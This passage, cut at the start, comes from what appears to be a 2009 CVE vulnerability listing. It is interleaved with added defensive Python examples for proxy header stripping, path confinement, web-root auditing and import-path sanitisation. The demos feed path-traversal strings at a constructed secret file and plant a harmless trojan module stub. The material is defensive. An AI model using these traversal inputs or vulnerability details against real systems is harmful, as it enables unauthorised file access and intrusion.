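            drop.update(t.strip().lower() for t in value.split(",") if t.strip())
    return [(n, v) for n, v in headers if n.lower() not in drop]


SAMPLE_REQUEST = (  # constructed, not captured traffic
    b"GET /stream.wmv HTTP/1.1\r\n"
    b"Host: media.example.net\r\n"
    b"User-Agent: NSPlayer/11.0\r\n"
    b"Authorization: Bearer origin-token\r\n"
    b"Proxy-Authorization: Basic YWxpY2U6cHJveHktc2VjcmV0\r\n"
    b"Connection: Keep-Alive, X-Proxy-Debug\r\n"
    b"X-Proxy-Debug: 1\r\n"
    b"\r\n"
)


def forwarded_names(raw: bytes) -> List[str]:
    """Names of the headers that would leave the proxy for the given request."""
    _, headers = parse_request(raw)
    return [n for n, _ in forwardable_headers(headers)]


if __name__ == "__main__":
    print(forwarded_names(SAMPLE_REQUEST))  # ['Host', 'User-Agent', 'Authorization']
```

Note the asymmetry: Authorization is end-to-end and is forwarded unchanged, while Proxy-Authorization is stripped regardless of whether the proxy actually demanded it. The list is recomputed per request because Connection can name arbitrary extra fields to drop.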
[CVE-2009-0611] Multiple cross-site scripting (XSS) vulnerabilities in qfsearch/AdminServlet in QuickFinder Server in Novell Open Enterprise Server 1.x allow remote attackers to inject arbitrary web script or HTML via (1) the siteloc parameter in a displayaddsite action, the site parameter in a (2) generalproperties or (3) clusterserviceproperties action, (4) the adminurl parameter in a global action, or (5) the print-list parameter.
[CVE-2009-0603] Cross-site scripting (XSS) vulnerability in index.php in the Link module 5.x-2.5 for Drupal 5.10 allows remote authenticated users, with "administer content types" privileges, to inject arbitrary web script or HTML via the description parameter (aka the Help field). NOTE: some of these details are obtained from third party information.
[CVE-2009-0594] Cross-site scripting (XSS) vulnerability in index.php in phpSkelSite 1.4 allows remote attackers to inject arbitrary web script or HTML via the PATH_INFO.
[CVE-2009-0575] Cross-site scripting (XSS) vulnerability in the theme_views_bulk_operations_confirmation function in views_bulk_operations.module in Views Bulk Operations 5.x before 5.x-1.3 and 6.x before 6.x-1.4, a module for Drupal, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors related to node titles. NOTE: some of these details are obtained from third party information.
[CVE-2009-0573] Multiple cross-site scripting (XSS) vulnerabilities in FotoWeb 6.0 (Build 273) allow remote attackers to inject arbitrary web script or HTML via the (1) s parameter to cmdrequest/Login.fwx and the (2) search parameter to Grid.fwx.
[CVE-2009-0571] admin.php in Ninja Designs Mailist 3.0 stores backup copies of maillist.php under the web root with insufficient access control, which allows remote attackers to obtain sensitive information via a direct request to the backup directory.
[CVE-2009-0568] The RPC Marshalling Engine (aka NDR) in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP2, Vista Gold, SP1, and SP2, and Server 2008 SP2 does not properly maintain its internal state, which allows remote attackers to overwrite arbitrary memory locations via a crafted RPC message that triggers incorrect pointer reading, related to "IDL interfaces containing a non-conformant varying array" and FC_SMVARRAY, FC_LGVARRAY, FC_VARIABLE_REPEAT, and FC_VARIABLE_OFFSET, aka "RPC Marshalling Engine Vulnerability."
[CVE-2009-0562] The Office Web Components ActiveX Control in Microsoft Office XP SP3, Office 2003 SP3, Office XP Web Components SP3, Office 2003 Web Components SP3, Office 2003 Web Components SP1 for the 2007 Microsoft Office System, Internet Security and Acceleration (ISA) Server 2004 SP3 and 2006 SP1, and Office Small Business Accounting 2006 does not properly allocate memory, which allows remote attackers to execute arbitrary code via unspecified vectors that trigger "system state" corruption, aka "Office Web Components Memory Allocation Vulnerability."
[CVE-2009-0554] Microsoft Internet Explorer 5.01 SP4, 6 SP1, 6 and 7 on Windows XP SP2 and SP3, 6 and 7 on Windows Server 2003 SP1 and SP2, 7 on Windows Vista Gold and SP1, and 7 on Windows Server 2008 allows remote attackers to execute arbitrary code via a web page that triggers presence of an object in memory that was (1) not properly initialized or (2) deleted, aka "Uninitialized Memory Corruption Vulnerability."
[CVE-2009-0553] Microsoft Internet Explorer 6 SP1, 6 and 7 on Windows XP SP2 and SP3, 6 and 7 on Windows Server 2003 SP1 and SP2, 7 on Windows Vista Gold and SP1, and 7 on Windows Server 2008 allows remote attackers to execute arbitrary code via a web page that triggers presence of an object in memory that was (1) not properly initialized or (2) deleted, aka "Uninitialized Memory Corruption Vulnerability."
[CVE-2009-0552] Unspecified vulnerability in Microsoft Internet Explorer 5.01 SP4, 6 SP1, 6 on Windows XP SP2 and SP3, and 6 on Windows Server 2003 SP1 and SP2 allows remote attackers to execute arbitrary code via a web page that triggers presence of an object in memory that was (1) not properly initialized or (2) deleted, aka "Uninitialized Memory Corruption Vulnerability."
[CVE-2009-0551] Microsoft Internet Explorer 6 SP1, 6 and 7 on Windows XP SP2 and SP3, 6 and 7 on Windows Server 2003 SP1 and SP2, 7 on Windows Vista Gold and SP1, and 7 on Windows Server 2008 does not properly handle transition errors in a request for one HTTP document followed by a request for a second HTTP document, which allows remote attackers to execute arbitrary code via vectors involving (1) multiple crafted pages on a web site or (2) a web page with crafted inline content such as banner advertisements, aka "Page Transition Memory Corruption Vulnerability."
[CVE-2009-0541] Multiple cross-site scripting (XSS) vulnerabilities in Magento 1.2.0 and 1.2.1.1 allow remote attackers to inject arbitrary web script or HTML via (1) the username field in an admin/ request to index.php, possibly related to the login[username] parameter and the app/code/core/Mage/Admin/Model/Session.php login function
[CVE-2009-0540] Cross-site scripting (XSS) vulnerability in Libero 5.3 SP5, and possibly other versions before 5.5 SP1, allows remote attackers to inject arbitrary web script or HTML via the search term field.
[CVE-2009-0533] Cross-site scripting (XSS) vulnerability in password.php in Scripts for Sites EZ Reminder allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, possibly involving the u2 parameter. NOTE: the provenance of this information is unknown.
[CVE-2009-0532] Cross-site scripting (XSS) vulnerability in password.php in Scripts For Sites (SFS) EZ Baby allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, possibly involving the u2 parameter. NOTE: the provenance of this information is unknown.
[CVE-2009-0529] Cross-site scripting (XSS) vulnerability in index.php in SnippetMaster Webpage Editor 2.2.2 allows remote attackers to inject arbitrary web script or HTML via the language parameter.
[CVE-2009-0526] Multiple cross-site scripting (XSS) vulnerabilities in index.php in AdaptCMS Lite 1.4 allow remote attackers to inject arbitrary web script or HTML via the (1) url and (2) acuparam parameters, and (3) the URI.
[CVE-2009-0525] Cross-site scripting (XSS) vulnerability in the sajax_get_common_js function in php/Sajax.php in Sajax 0.12 allows remote attackers to inject arbitrary web script or HTML via the URL parameter, which is not properly handled when using browsers that do not URL-encode requests, such as Internet Explorer 6. NOTE: the provenance of this information is unknown.
[CVE-2009-0524] Cross-site scripting (XSS) vulnerability in Adobe RoboHelp 6 and 7, and RoboHelp Server 6 and 7, allows remote attackers to inject arbitrary web script or HTML via vectors involving files produced by RoboHelp.
[CVE-2009-0523] Cross-site scripting (XSS) vulnerability in Adobe RoboHelp Server 6 and 7 allows remote attackers to inject arbitrary web script or HTML via a crafted URL, which is not properly handled when displaying the Help Errors log.
[CVE-2009-0514] Multiple directory traversal vulnerabilities in WebFrame 0.76 allow remote attackers to include and execute arbitrary local files via directory traversal sequences in the (1) currentmod and (2) LANG parameters to mod/index.php.
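
CVE-2009-0514 above, like CVE-2009-0640 earlier in this listing, is the same confinement failure: a client-supplied path is joined to a base directory without checking that the result stays inside it. The Python below is an added illustration and is not WebFrame or Swann code. resolve_under() canonicalises the joined path (following symlinks) and refuses anything that escapes the base; it assumes the caller has already percent-decoded the parameter exactly once. The directory tree it builds for the demo is constructed.

```python
import os
import tempfile
from pathlib import Path


class PathEscape(ValueError):
    """Raised when a user-supplied path would leave the base directory."""


def resolve_under(base: str, user_path: str) -> Path:
    """Return the canonical path for user_path inside base, or raise PathEscape.

    The check runs on the resolved path (symlinks and '..' removed), not on the
    raw string, so mixed separators, redundant '..' segments and symlinks that
    live inside base cannot be used to reach outside it.
    """
    if "\x00" in user_path:
        raise PathEscape("NUL byte in path")
    rel = user_path.replace("\\", "/")
    if rel.startswith("/"):
        raise PathEscape("absolute path not allowed")
    base_real = Path(base).resolve()
    target = (base_real / rel).resolve()
    if os.path.commonpath([str(base_real), str(target)]) != str(base_real):
        raise PathEscape(f"{user_path!r} escapes {base_real}")
    return target


def classify(base: str, user_path: str) -> str:
    """'ok:<relative path>' when confined, 'rejected' otherwise."""
    try:
        target = resolve_under(base, user_path)
    except PathEscape:
        return "rejected"
    return "ok:" + target.relative_to(Path(base).resolve()).as_posix()


def build_demo_tree() -> str:
    """Constructed layout: <tmp>/webroot/mod/lang/en.php, <tmp>/etc/secret.cfg outside
    the web root, and a symlink webroot/mod/etc_link pointing at <tmp>/etc."""
    root = Path(tempfile.mkdtemp())
    webroot = root / "webroot"
    (webroot / "mod" / "lang").mkdir(parents=True)
    (webroot / "mod" / "lang" / "en.php").write_text("<?php // language file\n")
    (root / "etc").mkdir()
    (root / "etc" / "secret.cfg").write_text("password=hunter2\n")
    try:
        os.symlink(root / "etc", webroot / "mod" / "etc_link")
    except (OSError, NotImplementedError):
        pass  # platforms without symlink support just skip that case
    return str(webroot)


def link_present(webroot: str) -> bool:
    return os.path.islink(os.path.join(webroot, "mod", "etc_link"))


if __name__ == "__main__":
    webroot = build_demo_tree()
    for p in ["mod/lang/en.php", "mod/../mod/lang/en.php", "../etc/secret.cfg",
              "mod/lang/../../../etc/secret.cfg", "mod/etc_link/secret.cfg"]:
        print(f"{p:36} -> {classify(webroot, p)}")
```

A string-level filter that only removes "../" sequences is what such bugs typically replace; it misses backslashes, "....//" collapses and symlinks, all of which the resolved-path comparison above handles because the decision is made on the final filesystem location.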
[CVE-2009-0513] Multiple PHP remote file inclusion vulnerabilities in WebFrame 0.76 allow remote attackers to execute arbitrary PHP code via a URL in the classFiles parameter to (1) admin/doc/index.php, (2) index.php, and (3) base/menu.php in mod/.
[CVE-2009-0508] The Servlet Engine/Web Container and JSP components in IBM WebSphere Application Server (WAS) 5.1.0, 5.1.1.19, 6.0.2 before 6.0.2.35, 6.1 before 6.1.0.23, and 7.0 before 7.0.0.3 allow remote attackers to read arbitrary files contained in war files in (1) web-inf, (2) meta-inf, and unspecified other directories via unknown vectors, related to (a) web-based applications and (b) the administrative console.
[CVE-2009-0507] IBM WebSphere Process Server (WPS) 6.1.2 before 6.1.2.3 and 6.2 before 6.2.0.1 does not properly restrict configuration data during an export of the cluster configuration file from the administrative console, which allows remote authenticated users to obtain the (1) JMSAPI, (2) ESCALATION, and (3) MAILSESSION (aka mail session) cleartext passwords via vectors involving access to a cluster member.
[CVE-2009-0506] Unspecified vulnerability in IBM WebSphere Application Server (WAS) 5.1 and 6.0.2 before 6.0.2.33 on z/OS, when CSIv2 Identity Assertion is enabled and Enterprise JavaBeans (EJB) interaction occurs between a WAS 6.1 instance and a WAS pre-6.1 instance, allows local users to have an unknown impact via vectors related to (1) use of the wrong subject and (2) multiple CBIND checks.
[CVE-2009-0504] WSPolicy in the Web Services component in IBM WebSphere Application Server (WAS) 7.0.x before 7.0.0.1 does not properly recognize the IDAssertion.isUsed binding property, which allows local users to discover a password by reading a SOAP message.
[CVE-2009-0503] IBM WebSphere Message Broker 6.1.x before 6.1.0.2 writes a database connection password to the Event Log and System Log during exception handling for a JDBC error, which allows local users to obtain sensitive information by reading these logs.
[CVE-2009-0502] Cross-site scripting (XSS) vulnerability in blocks/html/block_html.php in Snoopy 1.2.3, as used in Moodle 1.6 before 1.6.9, 1.7 before 1.7.7, 1.8 before 1.8.8, and 1.9 before 1.9.4, allows remote attackers to inject arbitrary web script or HTML via an HTML block, which is not properly handled when the "Login as" feature is used to visit a MyMoodle or Blog page.
[CVE-2009-0500] Cross-site scripting (XSS) vulnerability in course/lib.php in Moodle 1.6 before 1.6.9, 1.7 before 1.7.7, 1.8 before 1.8.8, and 1.9 before 1.9.4 allows remote attackers to inject arbitrary web script or HTML via crafted log table information that is not properly handled when it is displayed in a log report.
[CVE-2009-0498] Virtual GuestBook (vgbook) 2.1 stores sensitive information under the web root with insufficient access control, which allows remote attackers to download the database file via a direct request to guestbook.mdb.
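
Nine entries in this stretch of the listing (pHNews extra/genbackup.php, QuoteBook quotes.inc, PollHelper poll.inc, BlogHelper common_db.inc, Kipper job/config.data, Team Board data/team.mdb, Downloadcenter common.h, the Mailist backup directory and vgbook's guestbook.mdb) are one class: a file the application reads server-side sits under the document root with an extension the web server hands out verbatim. The Python below is an added audit helper, not code from any of those projects. It walks a document root, flags files that would be served as-is and look like configuration, database or backup material, and renders an Apache 2.4 FilesMatch stanza denying the extensions it found. The extension sets, the credential regex, the backup directory names and the sample tree are assumptions.

```python
import os
import re
import tempfile
from pathlib import Path
from typing import Dict, List

# Assumption: a handler executes these, so their source is not served raw.
EXECUTED = {".php", ".php3", ".asp", ".aspx", ".jsp", ".cgi", ".pl"}
# Assumption: data/config extensions that are served verbatim unless denied.
RAW_SENSITIVE = {".inc", ".mdb", ".data", ".h", ".bak", ".old", ".orig",
                 ".sql", ".ini", ".cfg", ".conf", ".log", ".sqlite", ".db"}
BACKUP_DIRS = {"backup", "backups", "bak", "_backup", "old"}
CRED_RE = re.compile(r"(?i)(password|passwd|pass|pwd|secret)\w*\s*[=:]")


def audit_webroot(webroot: str, max_bytes: int = 65536) -> Dict[str, List[str]]:
    """Map each suspicious file (relative POSIX path) to the reasons it was flagged."""
    findings: Dict[str, List[str]] = {}
    root = Path(webroot)
    for dirpath, _dirs, files in os.walk(root):
        rel_dir = Path(dirpath).relative_to(root)
        in_backup = any(part.lower() in BACKUP_DIRS for part in rel_dir.parts)
        for fname in files:
            path = Path(dirpath) / fname
            rel = (rel_dir / fname).as_posix()
            ext = path.suffix.lower()
            if ext in EXECUTED:
                if in_backup:  # stale copies of scripts are still worth removing
                    findings[rel] = ["inside a backup directory"]
                continue
            reasons: List[str] = []
            if in_backup:
                reasons.append("inside a backup directory")
            if ext in RAW_SENSITIVE:
                reasons.append(f"served verbatim: {ext}")
            try:
                head = path.read_bytes()[:max_bytes].decode("utf-8", "ignore")
            except OSError:
                head = ""
            if CRED_RE.search(head):
                reasons.append("credential-like content")
            if reasons:
                findings[rel] = reasons
    return findings


def apache_deny_block(findings: Dict[str, List[str]]) -> str:
    """Apache 2.4 stanza denying the flagged data extensions (not script extensions)."""
    exts = set()
    for rel in findings:
        ext = Path(rel).suffix.lower()
        if ext in RAW_SENSITIVE:
            exts.add(ext.lstrip("."))
    if not exts:
        return ""
    pattern = "|".join(re.escape(e) for e in sorted(exts))
    return f'<FilesMatch "\\.({pattern})$">\n    Require all denied\n</FilesMatch>'


def build_demo_tree() -> str:
    """Constructed sample document root mirroring the entries above."""
    root = Path(tempfile.mkdtemp())
    (root / "data").mkdir()
    (root / "backup").mkdir()
    (root / "index.php").write_text('<?php $db_pass = "hunter2"; include "common_db.inc"; ?>\n')
    (root / "common_db.inc").write_text('<?php $db_user = "app"; $db_pass = "hunter2"; ?>\n')
    (root / "data" / "team.mdb").write_bytes(b"\x00\x01\x00\x00Standard Jet DB\x00")
    (root / "backup" / "maillist.php").write_text("<?php // stale copy ?>\n")
    (root / "readme.txt").write_text("Installation notes.\n")
    return str(root)


if __name__ == "__main__":
    found = audit_webroot(build_demo_tree())
    for rel, reasons in sorted(found.items()):
        print(f"{rel:24} {', '.join(reasons)}")
    print(apache_deny_block(found))
```

The deny stanza is a stop-gap; the durable fix for every entry in this class is to move includes and data files above the document root, which is why findings based on content rather than extension (a credential in a .txt, say) are reported but not covered by the generated rule.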
[CVE-2009-0496] Multiple cross-site scripting (XSS) vulnerabilities in Ignite Realtime Openfire 3.6.2 allow remote attackers to inject arbitrary web script or HTML via the (1) log parameter to (a) logviewer.jsp and (b) log.jsp
[CVE-2009-0488] Cross-site scripting (XSS) vulnerability in Phorum before 5.2.10 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2009-0487] Cross-site scripting (XSS) vulnerability in Mahara before 1.0.9 allows remote attackers to inject arbitrary web script or HTML via a crafted forum post.
[CVE-2009-0481] Bugzilla 2.x before 2.22.7, 3.0 before 3.0.7, 3.2 before 3.2.1, and 3.3 before 3.3.2 allows remote authenticated users to conduct cross-site scripting (XSS) and related attacks by uploading HTML and JavaScript attachments that are rendered by web browsers.
[CVE-2009-0470] Multiple cross-site scripting (XSS) vulnerabilities in the HTTP server in Cisco IOS 12.4(23) allow remote attackers to inject arbitrary web script or HTML via the PATH_INFO to the default URI under (1) level/15/exec/-/ or (2) exec/, a different vulnerability than CVE-2008-3821.
[CVE-2009-0468] Multiple cross-site request forgery (CSRF) vulnerabilities in ajax.html in Profense Web Application Firewall 2.6.2 and 2.6.3 allow remote attackers to hijack the authentication of administrators for requests that (1) shutdown the server, (2) send ping packets, (3) enable network services, (4) configure a proxy server, and (5) modify other settings via parameters in the query string.
[CVE-2009-0467] Cross-site scripting (XSS) vulnerability in proxy.html in Profense Web Application Firewall 2.6.2 and 2.6.3 allows remote attackers to inject arbitrary web script or HTML via the proxy parameter in a deny_log manage action.
[CVE-2009-0466] Cross-site scripting (XSS) vulnerability in Vivvo CMS before 4.1.1 allows remote attackers to inject arbitrary web script or HTML via a URI that triggers a 404 Page Not Found response.
[CVE-2009-0455] Cross-site scripting (XSS) vulnerability in the anonymous comments feature in lib-comment.php in glFusion 1.1.0, 1.1.1, and earlier versions allows remote attackers to inject arbitrary web script or HTML via the username parameter to comment.php.
[CVE-2009-0446] SQL injection vulnerability in photo.php in WEBalbum 2.4b allows remote attackers to execute arbitrary SQL commands via the id parameter.
[CVE-2009-0440] IBM WebSphere Partner Gateway (WPG) 6.0.0 through 6.0.0.7 does not properly handle failures of signature verification, which might allow remote authenticated users to submit a crafted RosettaNet (aka RNIF) document to a backend application, related to (1) "altered service content" and (2) "digital signature foot-print."
[CVE-2009-0439] Unspecified vulnerability in the queue manager in IBM WebSphere MQ (WMQ) 5.3, 6.0 before 6.0.2.6, and 7.0 before 7.0.0.2 allows local users to gain privileges via vectors related to the (1) setmqaut, (2) dmpmqaut, and (3) dspmqaut authorization commands.
[CVE-2009-0438] IBM WebSphere Application Server (WAS) 7 before 7.0.0.1 on Windows allows remote attackers to bypass "Authorization checking" and obtain sensitive information from JSP pages via a crafted request. NOTE: this is probably a duplicate of CVE-2008-5412.
[CVE-2009-0437] The Installation Factory installation process for IBM WebSphere Application Server (WAS) 6.0.2 on Windows, when WAS is registered as a Windows service, allows local users to obtain sensitive information by reading the logs/instconfigifwas6.log log file.
[CVE-2009-0436] The (1) mod_ibm_ssl and (2) mod_cgid modules in IBM HTTP Server 6.0.x before 6.0.2.31 and 6.1.x before 6.1.0.19, as used in WebSphere Application Server (WAS), set incorrect permissions for AF_UNIX sockets, which has unknown impact and local attack vectors.
[CVE-2009-0435] Unspecified vulnerability in the IBM Asynchronous I/O (aka AIO or libibmaio) library in the Java Message Service (JMS) component in IBM WebSphere Application Server (WAS) 6.1.x before 6.1.0.17 on AIX 5.3 allows attackers to cause a denial of service (daemon crash) via vectors related to the aio_getioev2 and getEvent methods.
[CVE-2009-0434] PerfServlet in the PMI/Performance Tools component in IBM WebSphere Application Server (WAS) 6.0.x before 6.0.2.31, 6.1.x before 6.1.0.21, and 7.0.x before 7.0.0.1, when Performance Monitoring Infrastructure (PMI) is enabled, allows local users to obtain sensitive information by reading the (1) systemout.log and (2) ffdc files. NOTE: this is probably a duplicate of CVE-2008-5413.
[CVE-2009-0433] Unspecified vulnerability in IBM WebSphere Application Server (WAS) 5.1.x before 5.1.1.19, 6.0.x before 6.0.2.29, and 6.1.x before 6.1.0.19, when Web Server plug-in content buffering is enabled, allows attackers to cause a denial of service (daemon crash) via unknown vectors, related to a mishandling of client read failures in which clients receive many 500 HTTP error responses and backend servers are incorrectly labeled as down.
[CVE-2009-0432] The installation process for the File Transfer servlet in the System Management/Repository component in IBM WebSphere Application Server (WAS) 6.1.x before 6.1.0.19 does not enable the secure version, which allows remote attackers to obtain sensitive information via unspecified vectors.
[CVE-2009-0430] Multiple cross-site scripting (XSS) vulnerabilities in Active Bids allow remote attackers to inject arbitrary web script or HTML via the (1) search parameter to search.asp and the (2) URL parameter to tellafriend.asp.
[CVE-2009-0424] Cross-site scripting (XSS) vulnerability in sign1.php in AN Guestbook (ANG) before 0.7.7 allows remote attackers to inject arbitrary web script or HTML via the country parameter, which is not properly handled in (1) administrator/manage.php or (2) administrator/trash.php. NOTE: some of these details are obtained from third party information.
[CVE-2009-0419] Microsoft XML Core Services, as used in Microsoft Expression Web, Office, Internet Explorer 6 and 7, and other products, does not properly restrict access from web pages to Set-Cookie2 HTTP response headers, which allows remote attackers to obtain sensitive information from cookies via XMLHttpRequest calls, related to the HTTPOnly protection mechanism. NOTE: this issue reportedly exists because of an incomplete fix for CVE-2008-4033.
[CVE-2009-0417] Cross-site scripting (XSS) vulnerability in the AgaviWebRouting::gen(null) method in Agavi 0.11 before 0.11.6 and 1.0 before 1.0.0 beta 8 allows remote attackers to inject arbitrary web script or HTML via a crafted URL with certain characters that are not properly handled by web browsers that do not strictly follow RFC 3986, such as Internet Explorer 6 and 7.
[CVE-2009-0413] Cross-site scripting (XSS) vulnerability in RoundCube Webmail (roundcubemail) 0.2 stable allows remote attackers to inject arbitrary web script or HTML via the background attribute embedded in an HTML e-mail message.
[CVE-2009-0411] Google Chrome before 1.0.154.46 does not properly restrict access from web pages to the (1) Set-Cookie and (2) Set-Cookie2 HTTP response headers, which allows remote attackers to obtain sensitive information from cookies via XMLHttpRequest calls and other web script.
[CVE-2009-0404] Multiple cross-site scripting (XSS) vulnerabilities in Bioinformatics htmLawed 1.1.3 and 1.1.4 allow remote attackers to inject arbitrary web script or HTML via invalid Cascading Style Sheets (CSS) expressions in the style attribute, which is processed by Internet Explorer 7.
[CVE-2009-0393] Cross-site scripting (XSS) vulnerability in sysconf.cgi in Motorola Wimax modem CPEi300 allows remote authenticated users to inject arbitrary web script or HTML via the page parameter.
[CVE-2009-0391] Unspecified vulnerability in IBM WebSphere Application Server (WAS) 6.0.1 on z/OS allows attackers to read arbitrary files via unknown vectors.
[CVE-2009-0389] Multiple insecure method vulnerabilities in the Web On Windows (WOW) ActiveX control in WOW ActiveX 2 allow remote attackers to (1) create and overwrite arbitrary files via the WriteIniFileString method, (2) execute arbitrary programs via the ShellExecute method, (3) read from the registry via unspecified vectors, and (4) write to the registry via unspecified vectors. NOTE: vectors 1 and 2 can be used together to execute arbitrary code.
[CVE-2009-0378] Cross-site scripting (XSS) vulnerability in index.php in the beamospetition (com_beamospetition) 1.0.12 component for Joomla! allows remote attackers to inject arbitrary web script or HTML via the pet parameter in a sign action.
[CVE-2009-0364] Format string vulnerability in the mini_calendar component in Citadel.org WebCit 7.22, and other versions before 7.39, allows remote attackers to execute arbitrary code via unspecified vectors.
[CVE-2009-0359] Multiple cross-site scripting (XSS) vulnerabilities in Samizdat before 0.6.2 allow remote authenticated users to inject arbitrary web script or HTML via the (1) message title or (2) user full name.
[CVE-2009-0357] Mozilla Firefox before 3.0.6 and SeaMonkey before 1.1.15 do not properly restrict access from web pages to the (1) Set-Cookie and (2) Set-Cookie2 HTTP response headers, which allows remote attackers to obtain sensitive information from cookies via XMLHttpRequest calls, related to the HTTPOnly protection mechanism.
[CVE-2009-0347] Open redirect vulnerability in cs.html in the Autonomy (formerly Verity) Ultraseek search engine allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via the url parameter.
[CVE-2009-0339] SQL injection vulnerability in inc_webblogmanager.asp in DMXReady Blog Manager allows remote attackers to execute arbitrary SQL commands via the itemID parameter in a view action.
[CVE-2009-0338] Cross-site scripting (XSS) vulnerability in inc_webblogmanager.asp in DMXReady Blog Manager allows remote attackers to inject arbitrary web script or HTML via the CategoryID parameter in a refer action.
[CVE-2009-0336] Katy Whitton BlogIt! stores sensitive information under the web root with insufficient access control, which allows remote attackers to download the database file containing user credentials via a direct request for database/Blog.mdb. NOTE: some of these details are obtained from third party information.
[CVE-2009-0335] Cross-site scripting (XSS) vulnerability in index.asp in Katy Whitton BlogIt! allows remote attackers to inject arbitrary web script or HTML via the view parameter.
[CVE-2009-0333] SQL injection vulnerability in the WebAmoeba (WA) Ticket System (com_waticketsystem) component for Joomla! allows remote attackers to execute arbitrary SQL commands via the catid parameter in a category action to index.php.
[CVE-2009-0328] ROBS-PROJECTS Digital Sales IPN (aka DS-IPN.NET or DS-IPN Paypal Shop) stores sensitive information under the web root with insufficient access control, which allows remote attackers to download the database file containing user credentials via a direct request for Database/Sales.mdb.
[CVE-2009-0323] Multiple stack-based buffer overflows in W3C Amaya Web Browser 10.0 and 11.0 allow remote attackers to execute arbitrary code via (1) a long type parameter in an input tag, which is not properly handled by the EndOfXmlAttributeValue function
[CVE-2009-0316] Untrusted search path vulnerability in src/if_python.c in the Python interface in Vim before 7.2.045 allows local users to execute arbitrary code via a Trojan horse Python file in the current working directory, related to a vulnerability in the PySys_SetArgv function (CVE-2008-5983), as demonstrated by an erroneous search path for plugin/bike.vim in bicyclerepair.
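The CVE-2009-0316 entry above describes the effect of PySys_SetArgv placing the working directory at the front of the embedded interpreter's module search path. The following is an added example (not code from Vim, bicyclerepair or the vulnerability database) that reproduces the condition with a constructed module named `bike` (the name bicyclerepair's Python package uses; the file is a stand-in, not the real plugin) and shows the sanitization step that removes the working-directory entry:

```python
import importlib.machinery
import os
import sys
import tempfile

# Name of the module the constructed trojan shadows. bicyclerepair's Python
# package is called "bike"; the file written below is our own stand-in.
SHADOWED_MODULE = "bike"


def sanitize_search_path(search_path, cwd=None):
    """Return search_path without entries that resolve to the working directory.

    PySys_SetArgv with an empty argv[0] prepends '' (meaning the CWD) to sys.path;
    that entry lets a file in the working directory shadow an installed module.
    """
    cwd = os.path.realpath(cwd or os.getcwd())
    kept = []
    for entry in search_path:
        if entry in ("", "."):
            continue
        if os.path.realpath(entry) == cwd:
            continue
        kept.append(entry)
    return kept


def module_origin(name, search_path):
    """File that `import name` would load from on this search path (None if absent)."""
    spec = importlib.machinery.PathFinder.find_spec(name, search_path)
    return None if spec is None else spec.origin


def demo():
    """Plant a trojan module in a scratch directory, chdir there, and resolve the
    import on the vulnerable and on the sanitized path. Returns (trojan, before, after)."""
    with tempfile.TemporaryDirectory() as workdir:
        trojan = os.path.realpath(os.path.join(workdir, SHADOWED_MODULE + ".py"))
        with open(trojan, "w") as fh:
            # Only located, never executed, by this demo.
            fh.write("raise SystemExit('trojan module imported')\n")
        previous = os.getcwd()
        os.chdir(workdir)
        try:
            # What the embedded interpreter sees after PySys_SetArgv: CWD first.
            vulnerable_path = [""] + [p for p in sys.path if p not in ("", ".")]
            before = module_origin(SHADOWED_MODULE, vulnerable_path)
            after = module_origin(SHADOWED_MODULE, sanitize_search_path(vulnerable_path))
        finally:
            os.chdir(previous)
    before = os.path.realpath(before) if before else None
    after = os.path.realpath(after) if after else None
    return trojan, before, after


if __name__ == "__main__":
    trojan, before, after = demo()
    print("vulnerable path resolves 'bike' to:", before)
    print("sanitized path resolves 'bike' to:", after)
```

The same check applies to any host program that embeds Python: inspect `sys.path[0]` after initialization and drop it if it is empty or equal to the working directory before importing plugin code.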
[CVE-2009-0312] Cross-site scripting (XSS) vulnerability in the antispam feature (security/antispam.py) in MoinMoin 1.7 and 1.8.1 allows remote attackers to inject arbitrary web script or HTML via crafted, disallowed content.
[CVE-2009-0307] Cross-site scripting (XSS) vulnerability in the "Customize Statistics Page" (admin/statistics/ConfigureStatistics) in the MDS Connection Service in Research in Motion (RIM) BlackBerry Enterprise Server (BES) before 4.1.6 MR5 allows remote attackers to inject arbitrary web script or HTML via the (1) customDate, (2) interval, (3) lastCustomInterval, (4) lastIntervalLength, (5) nextCustomInterval, (6) nextIntervalLength, (7) action, (8) delIntervalIndex, (9) addStatIndex, (10) delStatIndex, and (11) referenceTime parameters.
[CVE-2009-0306] Buffer overflow in the IBM Lotus Notes Intellisync ActiveX control in lnresobject.dll in BlackBerry Desktop Manager in Research In Motion (RIM) BlackBerry Desktop Software before 5.0.1 allows remote attackers to execute arbitrary code via a crafted web page. NOTE: some of these details are obtained from third party information.
[CVE-2009-0305] Multiple stack-based buffer overflows in the Research in Motion RIM AxLoader ActiveX control in AxLoader.ocx and AxLoader.dll in BlackBerry Application Web Loader 1.0 allow remote attackers to execute arbitrary code via unspecified use of the (1) load or (2) loadJad method.
[CVE-2009-0303] Cross-site scripting (XSS) vulnerability in Web Help Desk before 9.1.18 allows remote attackers to inject arbitrary web script or HTML via vectors related to "encoded JavaScript" and Helpdesk.woa.
[CVE-2009-0285] Cross-site scripting (XSS) vulnerability in error.asp in BBSXP 5.13 and earlier allows remote attackers to inject arbitrary web script or HTML via the message parameter.
[CVE-2009-0283] Cross-site scripting (XSS) vulnerability in err.asp in Oblog allows remote attackers to inject arbitrary web script or HTML via the message parameter.
[CVE-2009-0278] Sun Java System Application Server (AS) 8.1 and 8.2 allows remote attackers to read the Web Application configuration files in the (1) WEB-INF or (2) META-INF directory via a malformed request.
[CVE-2009-0274] Unspecified vulnerability in WebAccess in Novell GroupWise 6.5, 7.0, 7.01, 7.02x, 7.03, 7.03HP1a, and 8.0 might allow remote attackers to obtain sensitive information via a crafted URL, related to conversion of POST requests to GET requests.
[CVE-2009-0273] Multiple cross-site scripting (XSS) vulnerabilities in Novell GroupWise WebAccess 6.5x, 7.0, 7.01, 7.02x, 7.03, 7.03HP1a, and 8.0 allow remote attackers to inject arbitrary web script or HTML via the (1) User.id and (2) Library.queryText parameters to gw/webacc, and other vectors involving (3) HTML e-mail and (4) HTML attachments.
[CVE-2009-0272] Cross-site request forgery (CSRF) vulnerability in Novell GroupWise WebAccess 6.5x, 7.0, 7.01, 7.02x, 7.03, 7.03HP1a, and 8.0 allows remote attackers to insert e-mail forwarding rules, and modify unspecified other configuration settings, as arbitrary users via unknown vectors.
